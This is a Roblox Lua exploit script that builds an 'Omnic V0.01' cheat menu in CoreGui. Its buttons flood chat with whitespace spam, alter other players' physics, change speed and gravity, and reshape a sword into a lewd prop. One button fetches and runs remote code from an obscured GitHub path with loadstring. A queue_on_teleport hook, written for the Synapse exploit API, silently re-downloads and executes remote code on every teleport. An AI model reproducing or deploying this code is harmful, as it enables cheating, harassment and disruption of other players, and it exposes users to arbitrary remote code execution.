local Omnic = Instance.new("ScreenGui")
local MainFrameBorder = Instance.new("Frame")
local MainFrame = Instance.new("Frame")
local Omnic_2 = Instance.new("TextLabel")
local V001 = Instance.new("TextLabel")
local BlackGreyFrame = Instance.new("UIGradient")
local DestroyGUI = Instance.new("TextButton")
local UIGradient = Instance.new("UIGradient")
local SwordDick = Instance.new("TextButton")
local AntiFling = Instance.new("TextButton")
local LagChat = Instance.new("TextButton")
local FatesAdmin = Instance.new("TextButton")
local SpeedHop = Instance.new("TextButton")
local BlackGreyBorder = Instance.new("UIGradient")

--Properties:

Omnic.Name = "Omnic"
Omnic.Parent = game.CoreGui

MainFrameBorder.Name = "MainFrameBorder"
MainFrameBorder.Parent = Omnic
MainFrameBorder.BackgroundColor3 = Color3.fromRGB(165, 165, 165)
MainFrameBorder.BorderSizePixel = 0
MainFrameBorder.Position = UDim2.new(-0.000305706984, 0, 0.538566172, 0)
MainFrameBorder.Size = UDim2.new(0, 364, 0, 290)

MainFrame.Name = "MainFrame"
MainFrame.Parent = MainFrameBorder
MainFrame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
MainFrame.BorderSizePixel = 0
MainFrame.Position = UDim2.new(0.0100977551, 0, 0.0174459871, 0)
MainFrame.Size = UDim2.new(0, 356, 0, 280)

Omnic_2.Name = "Omnic"
Omnic_2.Parent = MainFrame
Omnic_2.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Omnic_2.BackgroundTransparency = 1.000
Omnic_2.Position = UDim2.new(0.351415455, 0, 0.0455921739, 0)
Omnic_2.Size = UDim2.new(0, 105, 0, 32)
Omnic_2.Font = Enum.Font.GothamBlack
Omnic_2.Text = "Omnic"
Omnic_2.TextColor3 = Color3.fromRGB(83, 83, 83)
Omnic_2.TextSize = 28.000

V001.Name = "V0.01"
V001.Parent = MainFrame
V001.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
V001.BackgroundTransparency = 1.000
V001.BorderSizePixel = 0
V001.Position = UDim2.new(0.456985056, 0, 0.156306446, 0)
V001.Size = UDim2.new(0, 32, 0, 25)
V001.Font = Enum.Font.Roboto
V001.Text = "V0.01"
V001.TextColor3 = Color3.fromRGB(83, 83, 83)
V001.TextSize = 13.000

BlackGreyFrame.Color = ColorSequence.new{ColorSequenceKeypoint.new(0.00, Color3.fromRGB(27, 27, 27)), ColorSequenceKeypoint.new(1.00, Color3.fromRGB(63, 63, 63))}
BlackGreyFrame.Rotation = 90
BlackGreyFrame.Name = "Black & Grey Frame"
BlackGreyFrame.Parent = MainFrame

DestroyGUI.Name = "DestroyGUI"
DestroyGUI.Parent = MainFrame
DestroyGUI.BackgroundColor3 = Color3.fromRGB(227, 227, 227)
DestroyGUI.BorderColor3 = Color3.fromRGB(167, 167, 167)
DestroyGUI.BorderSizePixel = 2
DestroyGUI.Position = UDim2.new(0.881301045, 0, 0.0468743518, 0)
DestroyGUI.Size = UDim2.new(0, 25, 0, 25)
DestroyGUI.Font = Enum.Font.PermanentMarker
DestroyGUI.Text = "X"
DestroyGUI.TextColor3 = Color3.fromRGB(111, 111, 111)
DestroyGUI.TextSize = 24.000

UIGradient.Color = ColorSequence.new{ColorSequenceKeypoint.new(0.00, Color3.fromRGB(80, 80, 80)), ColorSequenceKeypoint.new(1.00, Color3.fromRGB(40, 40, 40))}
UIGradient.Parent = DestroyGUI

SwordDick.Name = "SwordDick"
SwordDick.Parent = MainFrame
SwordDick.BackgroundColor3 = Color3.fromRGB(34, 34, 34)
SwordDick.BorderColor3 = Color3.fromRGB(88, 88, 88)
SwordDick.BorderSizePixel = 2
SwordDick.Position = UDim2.new(0.393348753, 0, 0.420465767, 0)
SwordDick.Size = UDim2.new(0, 78, 0, 41)
SwordDick.Font = Enum.Font.SourceSansBold
SwordDick.Text = "Sword Dick"
SwordDick.TextColor3 = Color3.fromRGB(190, 190, 190)
SwordDick.TextSize = 15.000

AntiFling.Name = "AntiFling"
AntiFling.Parent = MainFrame
AntiFling.BackgroundColor3 = Color3.fromRGB(34, 34, 34)
AntiFling.BorderColor3 = Color3.fromRGB(88, 88, 88)
AntiFling.BorderSizePixel = 2
AntiFling.Position = UDim2.new(0.0649801493, 0, 0.423298657, 0)
AntiFling.Size = UDim2.new(0, 78, 0, 41)
AntiFling.Font = Enum.Font.SourceSansBold
AntiFling.Text = "Anti-Fling"
AntiFling.TextColor3 = Color3.fromRGB(190, 190, 190)
AntiFling.TextSize = 15.000

LagChat.Name = "LagChat"
LagChat.Parent = MainFrame
LagChat.BackgroundColor3 = Color3.fromRGB(34, 34, 34)
LagChat.BorderColor3 = Color3.fromRGB(88, 88, 88)
LagChat.BorderSizePixel = 2
LagChat.Position = UDim2.new(0.71166116, 0, 0.417117745, 0)
LagChat.Size = UDim2.new(0, 78, 0, 41)
LagChat.Font = Enum.Font.SourceSansBold
LagChat.Text = "Lag Chat"
LagChat.TextColor3 = Color3.fromRGB(190, 190, 190)
LagChat.TextSize = 15.000

FatesAdmin.Name = "FatesAdmin"
FatesAdmin.Parent = MainFrame
FatesAdmin.BackgroundColor3 = Color3.fromRGB(34, 34, 34)
FatesAdmin.BorderColor3 = Color3.fromRGB(88, 88, 88)
FatesAdmin.BorderSizePixel = 2
FatesAdmin.Position = UDim2.new(0.216665551, 0, 0.681403399, 0)
FatesAdmin.Size = UDim2.new(0, 78, 0, 41)
FatesAdmin.Font = Enum.Font.SourceSansBold
FatesAdmin.Text = "Fates Admin"
FatesAdmin.TextColor3 = Color3.fromRGB(190, 190, 190)
FatesAdmin.TextSize = 15.000

SpeedHop.Name = "SpeedHop"
SpeedHop.Parent = MainFrame
SpeedHop.BackgroundColor3 = Color3.fromRGB(34, 34, 34)
SpeedHop.BorderColor3 = Color3.fromRGB(88, 88, 88)
SpeedHop.BorderSizePixel = 2
SpeedHop.Position = UDim2.new(0.547843158, 0, 0.678570509, 0)
SpeedHop.Size = UDim2.new(0, 78, 0, 41)
SpeedHop.Font = Enum.Font.SourceSansBold
SpeedHop.Text = "Speed Hop"
SpeedHop.TextColor3 = Color3.fromRGB(190, 190, 190)
SpeedHop.TextSize = 15.000

BlackGreyBorder.Color = ColorSequence.new{ColorSequenceKeypoint.new(0.00, Color3.fromRGB(56, 56, 56)), ColorSequenceKeypoint.new(1.00, Color3.fromRGB(107, 107, 107))}
BlackGreyBorder.Rotation = 270
BlackGreyBorder.Name = "Black & Grey Border"
BlackGreyBorder.Parent = MainFrameBorder

-- Scripts:

local function YYQWJN_fake_script() -- DestroyGUI.Script 
	local script = Instance.new('Script', DestroyGUI)

	DestroyGUI.MouseButton1Down:Connect(function()
		local GUI = script.Parent.Parent.Parent.Parent
		GUI:Destroy()
	end)
end
coroutine.wrap(YYQWJN_fake_script)()
local function MXCSL_fake_script() -- SwordDick.LocalScript 
	local script = Instance.new('LocalScript', SwordDick)

	SwordDick.MouseButton1Down:Connect(function()
		local Sword_W = game.Workspace["6pKj5TgR7qrByP5HgnTb"].Sword
	
		Sword_W.Grip = CFrame.new(1.5, 1.5, 0.1)
		Sword_W.Handle.Mesh:Destroy()
	end)
end
coroutine.wrap(MXCSL_fake_script)()
local function RNTL_fake_script() -- AntiFling.LocalScript 
	local script = Instance.new('LocalScript', AntiFling)

	AntiFling.MouseButton1Down:Connect(function()
		local ez = true
		while ez == true do
			for i, v in next, game:GetService("Players"):GetPlayers() do
				if v and v ~= game:GetService("Players").LocalPlayer and v.Character then
					pcall(
						function()
							for i, v in next, v.Character:GetDescendants() do
								if v:IsA("BasePart") or v:IsA("Meshpart") and v.CanCollide then
									v.CanCollide = false
									v.Velocity = Vector3.new()
									v.RotVelocity = Vector3.new()
								end
							end
						end
					)
				end
			end
			game:GetService("RunService").Stepped:wait()
		end
	end)
	
	
end
coroutine.wrap(RNTL_fake_script)()
local function LJKKM_fake_script() -- LagChat.LocalScript 
	local script = Instance.new('LocalScript', LagChat)

	LagChat.MouseButton1Down:Connect(function()
		game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("                                                                                                                                                                                                        ", "All")
		game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("                                                                                                                                                                                                        ", "All")
		game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("                                                                                                                                                                                                        ", "All")
	end)
end
coroutine.wrap(LJKKM_fake_script)()
local function CKKJ_fake_script() -- FatesAdmin.LocalScript 
	local script = Instance.new('LocalScript', FatesAdmin)

	FatesAdmin.MouseButton1Down:Connect(function()
		loadstring(game:HttpGet("https://github.com/6pKj5TgR7qrByP5HgnTb/________/blob/main/ZGFBUAFZSDFJDSHAFBUSDAUFGZADJN"))()
	end)
end
coroutine.wrap(CKKJ_fake_script)()
local function GIAJ_fake_script() -- SpeedHop.LocalScript 
	local script = Instance.new('LocalScript', SpeedHop)

	SpeedHop.MouseButton1Down:Connect(function()
		game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = 30
		game.Players.LocalPlayer.Character.Humanoid.JumpPower = 50
		game.Workspace.Gravity = 500
	end)
end
coroutine.wrap(GIAJ_fake_script)()
local function VPXZ_fake_script() -- MainFrame.Anti-Void 
	local script = Instance.new('LocalScript', MainFrame)

	game.StarterGui:SetCore("SendNotification", {
		Title = "Omnic V0.01";
		Text = "Anti-Void automatically activated."
	})
	
	_G.fc = true
	spawn(function()
		while true do
			wait()
			if _G.fc then
				for i,v in pairs(game:GetService("Players")["LocalPlayer"].Character:GetDescendants()) do
					if v.Name == "RightGrip" and v:IsA("Weld") then
						v.Parent = game:GetService("SoundService")
					end
				end
			end
		end
	end)
end
coroutine.wrap(VPXZ_fake_script)()
local function NTCWGYV_fake_script() -- MainFrameBorder.Draggable 
	local script = Instance.new('Script', MainFrameBorder)

	local MainFrameBorder = script.Parent
	MainFrameBorder.Active = true
	MainFrameBorder.Draggable = true
end
coroutine.wrap(NTCWGYV_fake_script)()
local function VSIY_fake_script() -- Omnic.QueueOnTeleport 
	local script = Instance.new('Script', Omnic)

	local queue_on_teleport = syn and syn.queue_on_teleport or queue_on_teleport
	
	queue_on_teleport("loadstring(game.HttpGet(game, \"https://raw.githubusercontent.com/6pKj5TgR7qrByP5HgnTb/________/main/Code\"))()");
end
coroutine.wrap(VSIY_fake_script)()
